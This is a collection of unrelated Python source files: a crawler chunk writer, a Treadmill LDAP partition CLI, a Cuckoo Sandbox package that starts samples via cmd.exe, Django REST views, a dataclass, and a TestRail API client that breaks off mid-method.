doc_header = self.__compute_doc_header(link, title, html)
document = {'doc_header': doc_header, 'doc_data': bin_data}
#if len(self.documents) < 5:
self.documents.append(document)
#else:
# TODO: Move extra documents to new chunk
# for now if crawler tries to add too many documents to a chunk an exception is raised
#raise Exception('Max document count exceeded for chunk {}. Cannot append ')
return self.documents
def append_header_to_chunk(self):
"""
Called when all documents have been writen to chunk, appends header to end of chunk.
Header is fixed length(20 bytes), every 4 bytes represents a document.
Reading from left to right the documents go from 0 to 4.
:return: none
"""
if len(self.header):
with open(self.path, 'ab') as f:
for header_value in self.header:
f.write(header_value[0]) # append document_int_value
f.write(header_value[1]) # append document start offset
else:
raise Exception('Cannot append empty header to chunk.')
def compute_file_header_value(self, doc_int_value):
"""
Calculates the documents start offset. Document start = length of all content prior to document
:param doc_int_value: 0-4 int value
:return: list contain byte objects
"""
file_size = 0
for document in self.documents:
file_size += 14 + len(document['doc_data'])
doc_start_offset = file_size.to_bytes(3, byteorder='big')
bin_doc_int = doc_int_value.to_bytes(1, byteorder='big')
header_val = [bin_doc_int, doc_start_offset]
self.header.append(header_val)
return self.header
def __compute_doc_header(self, link, title, html):
"""
Calculates the document header, document header is a 14 byte long value that means:
doc_length(2 bytes), doc_start_offset(2 bytes), link_start(2 bytes), link_length(1 byte), title_start(2 bytes),
title_length(1 byte), html_start(2 bytes), html_length(2_bytes)
:param link: string
:param title: string
:param html: string
:return: array of byte objects
"""
file_size = 0
for document in self.documents:
file_size += 14 + len(document['doc_data'])
doc_header_length = 14
doc_length = len(link) + len(title) + len(html)
doc_start = doc_header_length + file_size
link_start = doc_header_length
title_start = doc_header_length + len(link)
html_start = doc_header_length + len(link) + len(title)
try:
bin_doc_length = doc_length.to_bytes(2, byteorder='big')
bin_doc_start = doc_start.to_bytes(2, byteorder='big')
bin_link_start = link_start.to_bytes(2, byteorder='big')
bin_link_len = len(link).to_bytes(1, byteorder='big')
bin_title_start = title_start.to_bytes(2, byteorder='big')
bin_title_len = len(title).to_bytes(1, byteorder='big')
bin_html_start = html_start.to_bytes(2, byteorder='big')
bin_html_len = len(html).to_bytes(2, byteorder='big')
doc_header = [bin_doc_length, bin_doc_start, bin_link_start, bin_link_len, bin_title_start, bin_title_len,
bin_html_start, bin_html_len]
return doc_header
except OverflowError as e:
self.log.debug(e)
self.log.debug('doc_length = {0}, link_length = {1}, title_length = {2}, html_length = {3}'.format(
doc_length, len(link), len(title), len(html)
))
|
"""Implementation of treadmill admin ldap CLI partition plugin.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import click
from ldap3.core import exceptions as ldap_exceptions
import six
from treadmill import admin
from treadmill import cli
from treadmill import context
_LOGGER = logging.getLogger(__name__)
_MINIMUM_THRESHOLD = 5
def _resolve_partition_threshold(cell, partition, value):
"""Resolve threshold % to an integer."""
admin_srv = admin.Server(context.GLOBAL.ldap.conn)
servers = admin_srv.list({'cell': cell})
total = 0
for srv in servers:
if srv['partition'] == partition:
total = total + 1
limit = int((value / 100.0) * total)
_LOGGER.debug('Total/limit: %s/%s', total, limit)
return max(limit, _MINIMUM_THRESHOLD)
def init():
"""Configures Partition CLI group"""
formatter = cli.make_formatter('partition')
@click.group()
@click.option('--cell', required=True,
envvar='TREADMILL_CELL',
is_eager=True, callback=cli.handle_context_opt,
expose_value=False)
def partition():
"""Manage partitions"""
pass
@partition.command()
@click.option('-m', '--memory', help='Memory.',
callback=cli.validate_memory)
@click.option('-c', '--cpu', help='CPU.',
callback=cli.validate_cpu)
@click.option('-d', '--disk', help='Disk.',
callback=cli.validate_disk)
@click.option('-s', '--systems', help='System eon id list', type=cli.LIST)
@click.option('-t', '--down-threshold', help='Down threshold.')
@click.option('-r', '--reboot-schedule', help='Reboot schedule.',
callback=cli.validate_reboot_schedule)
@click.argument('partition')
@cli.admin.ON_EXCEPTIONS
def configure(memory, cpu, disk, systems,
down_threshold, reboot_schedule, partition):
"""Create, get or modify partition configuration"""
# Disable too many branches.
#
# pylint: disable=R0912
cell = context.GLOBAL.cell
admin_part = admin.Partition(context.GLOBAL.ldap.conn)
attrs = {}
if memory:
attrs['memory'] = memory
if cpu:
attrs['cpu'] = cpu
if disk:
attrs['disk'] = disk
if systems:
if systems == ['-']:
attrs['systems'] = None
else:
attrs['systems'] = list(six.moves.map(int, systems))
if down_threshold:
if down_threshold.endswith('%'):
attrs['down-threshold'] = _resolve_partition_threshold(
cell, partition, int(down_threshold[:-1])
)
else:
attrs['down-threshold'] = int(down_threshold)
if reboot_schedule:
attrs['reboot-schedule'] = reboot_schedule
if attrs:
try:
admin_part.create([partition, cell], attrs)
except ldap_exceptions.LDAPEntryAlreadyExistsResult:
admin_part.update([partition, cell], attrs)
try:
cli.out(formatter(admin_part.get([partition, cell])))
except ldap_exceptions.LDAPNoSuchObjectResult:
click.echo('Partition does not exist: %s' % partition, err=True)
@partition.command(name='list')
@cli.admin.ON_EXCEPTIONS
def _list():
"""List partitions"""
cell = context.GLOBAL.cell
admin_cell = admin.Cell(context.GLOBAL.ldap.conn)
partitions = admin_cell.partitions(cell)
cli.out(formatter(partitions))
@partition.command()
@click.argument('label')
@cli.admin.ON_EXCEPTIONS
def delete(label):
"""Delete a partition"""
cell = context.GLOBAL.cell
admin_part = admin.Partition(context.GLOBAL.ldap.conn)
try:
admin_part.delete([label, cell])
except ldap_exceptions.LDAPNoSuchObjectResult:
click.echo('Partition does not exist: %s' % label, err=True)
del configure
del _list
del delete
return partition
|
import numpy as np
import pylab
from scipy import stats
#https://www.cnblogs.com/kylinlin/p/5309703.html
#未完待续:https://www.zhihu.com/question/25949022
|
# Copyright (C) 2010-2013 Claudio Guarnieri.
# Copyright (C) 2014-2016 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
from lib.common.abstracts import Package
from lib.common.rand import random_string
class Generic(Package):
"""Generic analysis package.
The sample is started using START command in a cmd.exe prompt.
"""
PATHS = [
("System32", "cmd.exe"),
]
def start(self, path):
cmd_path = self.get_path("cmd.exe")
# Create random cmd.exe window title.
rand_title = random_string(4, 16)
# START syntax.
# See: https://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/start.mspx?mfr=true
# start ["title"] [/dPath] [/i] [/min] [/max] [{/separate | /shared}]
# [{/low | /normal | /high | /realtime | /abovenormal | belownormal}]
# [/wait] [/b] [FileName] [parameters]
args = ["/c", "start", "/wait", '"%s"' % rand_title, path]
return self.execute(cmd_path, args=args, trigger="file:%s" % path)
|
from django.shortcuts import get_object_or_404
from rest_framework import mixins
from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework.permissions import AllowAny
from .models import Category, Product, ProductPicture
from .serializers import CategorySerializer, ProductSerializer, ProductDetailedSerializer,FeaturedCategorySerializer
class CategoryView(mixins.ListModelMixin, mixins.RetrieveModelMixin, viewsets.GenericViewSet):
permission_classes = (AllowAny, )
queryset = Category.objects.all()
serializer_class = CategorySerializer
def list(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
serializer = self.get_serializer(queryset, many=True)
return Response(serializer.data)
class ProductView(mixins.ListModelMixin, viewsets.GenericViewSet):
permission_classes = (AllowAny, )
queryset = Product.objects.all()
serializer_class = ProductSerializer
def get_queryset(self):
queryset = self.queryset
category_id = self.kwargs.get('category', None)
if category_id is not None:
queryset = queryset.filter(category=category_id)
return queryset
class ProductDetailedView(mixins.RetrieveModelMixin, viewsets.GenericViewSet):
permission_classes = (AllowAny, )
queryset = Product.objects.all()
serializer_class = ProductDetailedSerializer
class FeaturedProductView(mixins.ListModelMixin, viewsets.GenericViewSet):
permission_classes = (AllowAny, )
queryset = Category.objects.all()
serializer_class = FeaturedCategorySerializer
def list(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
serializer = self.get_serializer(queryset, many=True)
return Response(serializer.data)
|
from typing import List, Union
from dataclasses import dataclass
@dataclass
class Sentence:
tokens: List[str]
raw: str
imgid: int
sentid: int |
# pylint: disable=C0302
"""
TestRail API categories
"""
from pathlib import Path
from typing import List, Optional, Union
from ._enums import METHODS
class _MetaCategory:
"""Meta Category"""
def __init__(self, session) -> None:
self._session = session
class Cases(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-cases"""
def get_case(self, case_id: int) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-cases#get_case
Returns an existing test case.
:param case_id: The ID of the test case
:return: response
"""
return self._session.request(METHODS.GET, f"get_case/{case_id}")
def get_cases(self, project_id: int, **kwargs) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-cases#get_cases
Returns a list of test cases for a test suite or specific section in a test suite.
:param project_id: The ID of the project
:key suite_id: int - The ID of the test suite (optional if the project is operating in single suite mode)
:key section_id: int - The ID of the section (optional)
:key limit: int - The number of test cases the response should return
:key offset: Where to start counting the tests cases from (the offset)
:key filter: Only return cases with matching filter string in the case title
:return: response
"""
return self._session.request(
METHODS.GET, f"get_cases/{project_id}", params=kwargs
)
def add_case(self, section_id: int, title: str, **kwargs) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-cases#add_case
Creates a new test case.
:param section_id: The ID of the section the test case should be added to
:param title: The title of the test case (required)
:key template_id: int - The ID of the template (field layout) (requires TestRail 5.2 or later)
:key type_id: int - The ID of the case type
:key priority_id: int - The ID of the case priority
:key estimate: str - The estimate, e.g. "30s" or "1m 45s"
:key milestone_id: int - The ID of the milestone to link to the test case
:key refs: str - A comma-separated list of references/requirements
Custom fields are supported as well and must be submitted with their system name, prefixed with 'custom_', e.g.:
{
..
"custom_preconds": "These are the preconditions for a test case"
..
}
:return: response
"""
data = dict(title=title, **kwargs)
return self._session.request(METHODS.POST, f"add_case/{section_id}", json=data)
def update_case(self, case_id: int, **kwargs) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-cases#update_case
Updates an existing test case (partial updates are supported, i.e.
you can submit and update specific fields only).
:param case_id: The ID of the test case
:param kwargs: This method supports the same POST fields as add_case (except section_id).
:return: response
"""
return self._session.request(
METHODS.POST, f"update_case/{case_id}", json=kwargs
)
def delete_case(self, case_id: int) -> None:
"""
http://docs.gurock.com/testrail-api2/reference-cases#delete_case
Deletes an existing test case.
:param case_id: The ID of the test case
:return: response
"""
return self._session.request(METHODS.POST, f"delete_case/{case_id}")
class CaseFields(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-cases-fields"""
def get_case_fields(self) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-cases-fields#get_case_fields
Returns a list of available test case custom fields.
:return: response
"""
return self._session.request(METHODS.GET, "get_case_fields")
def add_case_field(
self, type: str, name: str, label: str, **kwargs # pylint: disable=W0622
) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-cases-fields#add_case_field
Creates a new test case custom field.
:param type: str - The type identifier for the new custom field (required). The following types are supported:
String, Integer, Text, URL, Checkbox, Dropdown, User, Date, Milestone, Steps, Multiselect
You can pass the number of the type as well as the word, e.g. "5", "string", "String", "Dropdown",
"12". The numbers must be sent as a string e.g {type: "5"} not {type: 5},
otherwise you will get a 400 (Bad Request) response.
:param name: str - The name for new the custom field (required)
:param label: str - The label for the new custom field (required)
:key description: str - The description for the new custom field
:key include_all: bool - Set flag to true if you want the new custom field included for all templates.
Otherwise (false) specify the ID's of templates to be included as the next
parameter (template_ids)
:key template_ids: list - ID's of templates new custom field will apply to if include_all is set to false
:key configs: dict - An object wrapped in an array with two default keys, 'context' and 'options'
:return: response
"""
data = dict(type=type, name=name, label=label, **kwargs)
return self._session.request(METHODS.POST, "add_case_field", json=data)
class CaseTypes(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-cases-types"""
def get_case_types(self) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-cases-types#get_case_types
Returns a list of available case types.
:return: response
"""
return self._session.request(METHODS.GET, "get_case_types")
class Configurations(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-configs"""
def get_configs(self, project_id: int) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-configs#get_configs
Returns a list of available configurations, grouped by configuration groups (requires TestRail 3.1 or later).
:param project_id: The ID of the project
:return: response
"""
return self._session.request(METHODS.GET, f"get_configs/{project_id}")
def add_config_group(self, project_id: int, name: str) -> None:
"""
http://docs.gurock.com/testrail-api2/reference-configs#add_config_group
Creates a new configuration group (requires TestRail 5.2 or later).
:param project_id: The ID of the project the configuration group should be added to
:param name: The name of the configuration group (required)
:return: response
"""
return self._session.request(
METHODS.POST, f"add_config_group/{project_id}", json={"name": name}
)
def add_config(self, config_group_id: int, name: str) -> None:
"""
http://docs.gurock.com/testrail-api2/reference-configs#add_config
Creates a new configuration (requires TestRail 5.2 or later).
:param config_group_id: The ID of the configuration group the configuration should be added to
:param name: The name of the configuration (required)
:return: response
"""
return self._session.request(
METHODS.POST, f"add_config/{config_group_id}", json={"name": name}
)
def update_config_group(self, config_group_id: int, name: str) -> None:
"""
http://docs.gurock.com/testrail-api2/reference-configs#update_config_group
Updates an existing configuration group (requires TestRail 5.2 or later).
:param config_group_id: The ID of the configuration group
:param name: The name of the configuration group
:return: response
"""
return self._session.request(
METHODS.POST, f"update_config_group/{config_group_id}", json={"name": name}
)
def update_config(self, config_id: int, name: str) -> None:
"""
http://docs.gurock.com/testrail-api2/reference-configs#update_config
Updates an existing configuration (requires TestRail 5.2 or later).
:param config_id: The ID of the configuration
:param name: The name of the configuration
:return: response
"""
return self._session.request(
METHODS.POST, f"update_config/{config_id}", json={"name": name}
)
def delete_config_group(self, config_group_id: int) -> None:
"""
http://docs.gurock.com/testrail-api2/reference-configs#delete_config_group
Deletes an existing configuration group and its configurations (requires TestRail 5.2 or later).
:param config_group_id: The ID of the configuration group
:return: response
"""
return self._session.request(
METHODS.POST, f"delete_config_group/{config_group_id}"
)
def delete_config(self, config_id: int) -> None:
"""
http://docs.gurock.com/testrail-api2/reference-configs#delete_config
Deletes an existing configuration (requires TestRail 5.2 or later).
:param config_id: The ID of the configuration
:return: response
"""
return self._session.request(METHODS.POST, f"delete_config/{config_id}")
class Milestones(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-milestones"""
def get_milestone(self, milestone_id: int) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-milestones#get_milestone
Returns an existing milestone.
:param milestone_id: The ID of the milestone
:return: response
"""
return self._session.request(METHODS.GET, f"get_milestone/{milestone_id}")
def get_milestones(self, project_id: int, **kwargs) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-milestones#get_milestones
Returns the list of milestones for a project.
:param project_id: The ID of the project
:key is_completed: 1 to return completed milestones only. 0 to return open (active/upcoming)
milestones only (available since TestRail 4.0).
:key is_started: 1 to return started milestones only. 0 to return upcoming milestones only
(available since TestRail 5.3).
:return: response
"""
return self._session.request(
METHODS.GET, f"get_milestones/{project_id}", params=kwargs
)
def add_milestone(self, project_id: int, name: str, **kwargs) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-milestones#add_milestone
Creates a new milestone.
:param project_id: The ID of the project the milestone should be added to
:param name: str - The name of the milestone (required)
:key description: str - The description of the milestone
:key due_on: int - The due date of the milestone (as UNIX timestamp)
:key parent_id: int - The ID of the parent milestone, if any (for sub-milestones)
(available since TestRail 5.3)
:key start_on: int - The scheduled start date of the milestone (as UNIX timestamp)
(available since TestRail 5.3)
:return: response
"""
data = dict(name=name, **kwargs)
return self._session.request(
METHODS.POST, f"add_milestone/{project_id}", json=data
)
def update_milestone(self, milestone_id: int, **kwargs) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-milestones#update_milestone
Updates an existing milestone (partial updates are supported, i.e.
you can submit and update specific fields only).
:param milestone_id: The ID of the milestone
:key is_completed: bool - True if a milestone is considered completed and false otherwise
:key is_started: bool - True if a milestone is considered started and false otherwise
:key parent_id: int - The ID of the parent milestone, if any (for sub-milestones)
(available since TestRail 5.3)
:key start_on: int - The scheduled start date of the milestone (as UNIX timestamp)
(available since TestRail 5.3)
:return: response
"""
return self._session.request(
METHODS.POST, f"update_milestone/{milestone_id}", json=kwargs
)
def delete_milestone(self, milestone_id: int) -> None:
"""
http://docs.gurock.com/testrail-api2/reference-milestones#delete_milestone
Deletes an existing milestone.
:param milestone_id: The ID of the milestone
:return: response
"""
return self._session.request(METHODS.POST, f"delete_milestone/{milestone_id}")
class Plans(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-plans"""
def get_plan(self, plan_id: int) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-plans#get_plan
Returns an existing test plan.
:param plan_id: The ID of the test plan
:return: response
"""
return self._session.request(METHODS.GET, f"get_plan/{plan_id}")
def get_plans(self, project_id: int, **kwargs) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-plans#get_plans
Returns a list of test plans for a project.
:param project_id: The ID of the project
:param kwargs: filters
:key created_after: int - Only return test plans created after this date (as UNIX timestamp).
:key created_before: int - Only return test plans created before this date (as UNIX timestamp).
:key created_by: int(list) - A comma-separated list of creators (user IDs) to filter by.
:key is_completed: int - 1 to return completed test plans only. 0 to return active test plans only.
:key limit/offset: int - Limit the result to :limit test plans. Use :offset to skip records.
:key milestone_id: int(list) - A comma-separated list of milestone IDs to filter by.
:return: response
"""
return self._session.request(
METHODS.GET, f"get_plans/{project_id}", params=kwargs
)
def add_plan(self, project_id: int, name: str, **kwargs) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-plans#add_plan
Creates a new test plan.
:param project_id: The ID of the project the test plan should be added to
:param name: The name of the test plan (required)
:key description: str - The description of the test plan
:key milestone_id: int - The ID of the milestone to link to the test plan
:key entries: list - An array of objects describing the test runs of the plan,
see the example below and add_plan_entry
:return: response
"""
data = dict(name=name, **kwargs)
return self._session.request(METHODS.POST, f"add_plan/{project_id}", json=data)
def add_plan_entry(self, plan_id: int, suite_id: int, **kwargs) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-plans#add_plan_entry
Adds one or more new test runs to a test plan.
:param plan_id: The ID of the plan the test runs should be added to
:param suite_id: The ID of the test suite for the test run(s) (required)
:key name: str - The name of the test run(s)
:key description: str - The description of the test run(s) (requires TestRail 5.2 or later)
:key assignedto_id: int - The ID of the user the test run(s) should be assigned to
:key include_all: bool - True for including all test cases of the test suite and false for a custom case
selection (default: true)
:key case_ids: list - An array of case IDs for the custom case selection
:key config_ids: list - An array of configuration IDs used for the test runs of the test plan entry
(requires TestRail 3.1 or later)
:key runs: list - An array of test runs with configurations, please see the example below for details
(requires TestRail 3.1 or later)
:return: response
"""
data = dict(suite_id=suite_id, **kwargs)
return self._session.request(
METHODS.POST, f"add_plan_entry/{plan_id}", json=data
)
def update_plan(self, plan_id: int, **kwargs) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-plans#update_plan
Updates an existing test plan (partial updates are supported,
i.e. you can submit and update specific fields only).
:param plan_id: The ID of the test plan
:param kwargs: With the exception of the entries field, this method supports the same POST fields as add_plan.
:return: response
"""
return self._session.request(
METHODS.POST, f"update_plan/{plan_id}", json=kwargs
)
def update_plan_entry(self, plan_id: int, entry_id: int, **kwargs) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-plans#update_plan_entry
Updates one or more existing test runs in a plan (partial updates are supported,
i.e. you can submit and update specific fields only).
:param plan_id: The ID of the test plan
:param entry_id: The ID of the test plan entry (note: not the test run ID)
:key name: str - The name of the test run(s)
:key description: str - The description of the test run(s) (requires TestRail 5.2 or later)
:key assignedto_id: int - The ID of the user the test run(s) should be assigned to
:key include_all: bool - True for including all test cases of the test suite and false for a custom case
selection (default: true)
:key case_ids: list - An array of case IDs for the custom case selection
:return: response
"""
return self._session.request(
METHODS.POST, f"update_plan_entry/{plan_id}/{entry_id}", json=kwargs
)
def close_plan(self, plan_id: int) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-plans#close_plan
Closes an existing test plan and archives its test runs & results.
:param plan_id: The ID of the test plan
:return: response
"""
return self._session.request(METHODS.POST, f"close_plan/{plan_id}")
def delete_plan(self, plan_id: int) -> None:
"""
http://docs.gurock.com/testrail-api2/reference-plans#delete_plan
Deletes an existing test plan.
:param plan_id: The ID of the test plan
:return: response
"""
return self._session.request(METHODS.POST, f"delete_plan/{plan_id}")
def delete_plan_entry(self, plan_id: int, entry_id: int) -> None:
"""
http://docs.gurock.com/testrail-api2/reference-plans#delete_plan_entry
Deletes one or more existing test runs from a plan.
:param plan_id: The ID of the test plan
:param entry_id: The ID of the test plan entry (note: not the test run ID)
:return: response
"""
return self._session.request(
METHODS.POST, f"delete_plan_entry/{plan_id}/{entry_id}"
)
class Priorities(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-priorities"""
def get_priorities(self) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-priorities#get_priorities
Returns a list of available priorities.
:return: response
"""
return self._session.request(METHODS.GET, "get_priorities")
class Projects(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-projects"""
def get_project(self, project_id: int) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-projects#get_project
Returns an existing project.
:param project_id: The ID of the project
:return: response
"""
return self._session.request(METHODS.GET, f"get_project/{project_id}")
def get_projects(self, **kwargs) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-projects#get_projects
Returns the list of available projects.
:param kwargs: filter
:key is_completed: int - 1 to return completed projects only. 0 to return active projects only.
:return: response
"""
return self._session.request(METHODS.GET, "get_projects", params=kwargs)
def add_project(self, name: str, **kwargs) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-projects#add_project
Creates a new project (admin status required).
:param name: The name of the project (required)
:key announcement: str - The description of the project
:key show_announcement: bool - True if the announcement should be displayed on the project's
overview page and false otherwise
:key suite_mode: int - The suite mode of the project (1 for single suite mode,
2 for single suite + baselines, 3 for multiple suites) (added with TestRail 4.0)
:return: response
"""
data = dict(name=name, **kwargs)
return self._session.request(METHODS.POST, "add_project", json=data)
def update_project(self, project_id: int, **kwargs) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-projects#update_project
Updates an existing project (admin status required; partial updates are supported,
i.e. you can submit and update specific fields only).
:param project_id: The ID of the project
:param kwargs: In addition to the POST fields supported by add_project, this method also supports
:key is_completed: bool - Specifies whether a project is considered completed or not
:return: response
"""
return self._session.request(
METHODS.POST, f"update_project/{project_id}", json=kwargs
)
def delete_project(self, project_id: int) -> None:
"""
http://docs.gurock.com/testrail-api2/reference-projects#delete_project
Deletes an existing project (admin status required).
:param project_id: The ID of the project
:return: response
"""
return self._session.request(METHODS.POST, f"delete_project/{project_id}")
class Results(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-results"""
def get_results(self, test_id: int, **kwargs) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-results#get_results
Returns a list of test results for a test.
:param test_id: The ID of the test
:param kwargs: filters
:key limit/offset: int - Limit the result to :limit test results. Use :offset to skip records.
:key status_id: int(list) - A comma-separated list of status IDs to filter by.
:return: response
"""
return self._session.request(
METHODS.GET, f"get_results/{test_id}", params=kwargs
)
def get_results_for_case(self, run_id: int, case_id: int, **kwargs) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-results#get_results_for_case
Returns a list of test results for a test run and case combination.
The difference to get_results is that this method expects a test run + test case instead of a test.
In TestRail, tests are part of a test run and the test cases are part of the related test suite.
So, when you create a new test run, TestRail creates a test for each test case found in the test suite
of the run. You can therefore think of a test as an “instance” of a test case which can have test results,
comments and a test status. Please also see TestRail's getting started guide for more details about the
differences between test cases and tests.
:param run_id: The ID of the test run
:param case_id: The ID of the test case
:param kwargs: filters
:key limit/offset: int - Limit the result to :limit test results. Use :offset to skip records.
:key status_id: int(list) - A comma-separated list of status IDs to filter by.
:return: response
"""
return self._session.request(
METHODS.GET, f"get_results_for_case/{run_id}/{case_id}", params=kwargs
)
def get_results_for_run(self, run_id: int, **kwargs) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-results#get_results_for_run
Returns a list of test results for a test run.
Requires TestRail 4.0 or later.
:param run_id: The ID of the test run
:param kwargs: filters
:key created_after: int - Only return test results created after this date (as UNIX timestamp).
:key created_before: int - Only return test results created before this date (as UNIX timestamp).
:key created_by: int(list) - A comma-separated list of creators (user IDs) to filter by.
:key limit/offset: int - Limit the result to :limit test results. Use :offset to skip records.
:key status_id: int(list) - A comma-separated list of status IDs to filter by.
:return: response
"""
return self._session.request(
METHODS.GET, f"get_results_for_run/{run_id}", params=kwargs
)
def add_result(self, test_id: int, **kwargs) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-results#add_result
Adds a new test result, comment or assigns a test.
It's recommended to use add_results instead if you plan to add results for multiple tests.
:param test_id: The ID of the test the result should be added to
:key status_id: int - The ID of the test status. The built-in system statuses have the following IDs:
1 - Passed
2 - Blocked
3 - Untested (not allowed when adding a result)
4 - Retest
5 - Failed
You can get a full list of system and custom statuses via get_statuses.
:key comment: str - The comment / description for the test result
:key version: str - The version or build you tested against
:key elapsed: str - The time it took to execute the test, e.g. "30s" or "1m 45s"
:key defects: str - A comma-separated list of defects to link to the test result
:key assignedto_id: int - The ID of a user the test should be assigned to
:return: response
"""
return self._session.request(METHODS.POST, f"add_result/{test_id}", json=kwargs)
def add_result_for_case(self, run_id: int, case_id: int, **kwargs) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-results#add_result_for_case
Adds a new test result, comment or assigns a test (for a test run and case combination).
It's recommended to use add_results_for_cases instead if you plan to add results for multiple test cases.
The difference to add_result is that this method expects a test run + test case instead of a test.
In TestRail, tests are part of a test run and the test cases are part of the related test suite.
So, when you create a new test run, TestRail creates a test for each test case found in the test suite
of the run. You can therefore think of a test as an “instance” of a test case which can have test results,
comments and a test status. Please also see TestRail's getting started guide for more details about the
differences between test cases and tests.
:param run_id: The ID of the test run
:param case_id: The ID of the test case
:param kwargs: This method supports the same POST fields as add_result.
:return: response
"""
return self._session.request(
METHODS.POST, f"add_result_for_case/{run_id}/{case_id}", json=kwargs
)
def add_results(self, run_id: int, results: List[dict]) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-results#add_results
This method expects an array of test results (via the 'results' field, please see below).
Each test result must specify the test ID and can pass in the same fields as add_result,
namely all test related system and custom fields.
Please note that all referenced tests must belong to the same test run.
:param run_id: The ID of the test run the results should be added to
:param results: List[dict]
This method expects an array of test results (via the 'results' field, please see below).
Each test result must specify the test ID and can pass in the same fields as add_result,
namely all test related system and custom fields.
Please note that all referenced tests must belong to the same test run.
:return: response
"""
return self._session.request(
METHODS.POST, f"add_results/{run_id}", json={"results": results}
)
def add_results_for_cases(self, run_id: int, results: List[dict]) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-results#add_results_for_cases
Adds one or more new test results, comments or assigns one or more tests (using the case IDs).
Ideal for test automation to bulk-add multiple test results in one step.
Requires TestRail 3.1 or later
:param run_id: The ID of the test run the results should be added to
:param results: List[dict]
This method expects an array of test results (via the 'results' field, please see below).
Each test result must specify the test case ID and can pass in the same fields as add_result,
namely all test related system and custom fields.
The difference to add_results is that this method expects test case IDs instead of test IDs.
Please see add_result_for_case for details.
Please note that all referenced tests must belong to the same test run.
:return: response
"""
return self._session.request(
METHODS.POST, f"add_results_for_cases/{run_id}", json={"results": results}
)
class ResultFields(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-results-fields"""
def get_result_fields(self) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-results-fields#get_result_fields
Returns a list of available test result custom fields.
:return: response
"""
return self._session.request(METHODS.GET, "get_result_fields")
class Runs(_MetaCategory):
"""http://docs.gurock.com/testrail-api2/reference-runs"""
def get_run(self, run_id: int) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-runs#get_run
Returns an existing test run. Please see get_tests for the list of included tests in this run.
:param run_id: The ID of the test run
:return: response
"""
return self._session.request(METHODS.GET, f"get_run/{run_id}")
def get_runs(self, project_id: int, **kwargs) -> List[dict]:
"""
http://docs.gurock.com/testrail-api2/reference-runs#get_runs
Returns a list of test runs for a project. Only returns those test runs that are not part of a test plan
(please see get_plans/get_plan for this).
:param project_id: The ID of the project
:param kwargs: filters
:key created_after: int - Only return test runs created after this date (as UNIX timestamp).
:key created_before: int - Only return test runs created before this date (as UNIX timestamp).
:key created_by: int(list) - A comma-separated list of creators (user IDs) to filter by.
:key is_completed: int - 1 to return completed test runs only. 0 to return active test runs only.
:key limit/offset: int - Limit the result to :limit test runs. Use :offset to skip records.
:key milestone_id: int(list) - A comma-separated list of milestone IDs to filter by.
:key suite_id: int(list) - A comma-separated list of test suite IDs to filter by.
:return: response
"""
return self._session.request(
METHODS.GET, f"get_runs/{project_id}", params=kwargs
)
def add_run(self, project_id: int, **kwargs) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-runs#add_run
Creates a new test run.
:param project_id: The ID of the project the test run should be added to
:key suite_id: int - The ID of the test suite for the test run
(optional if the project is operating in single suite mode, required otherwise)
:key name: str - The name of the test run
:key description: str - The description of the test run
:key milestone_id: int - The ID of the milestone to link to the test run
:key assignedto_id: int - The ID of the user the test run should be assigned to
:key include_all: bool - True for including all test cases of the test suite and false for a
custom case selection (default: true)
:key case_ids: list - An array of case IDs for the custom case selection
:return: response
"""
return self._session.request(METHODS.POST, f"add_run/{project_id}", json=kwargs)
def update_run(self, run_id: int, **kwargs) -> dict:
"""
http://docs.gurock.com/testrail-api2/reference-runs#update_run
Updates an existing test run (partial updates are supported,
i.e. you can submit and update specific fields only).
:param run_id: The ID of the test run
:param kwargs: With the exception of the suite_id and assignedto_id fields,
this method supports the same POST fields as add_run.
:return: response
"""
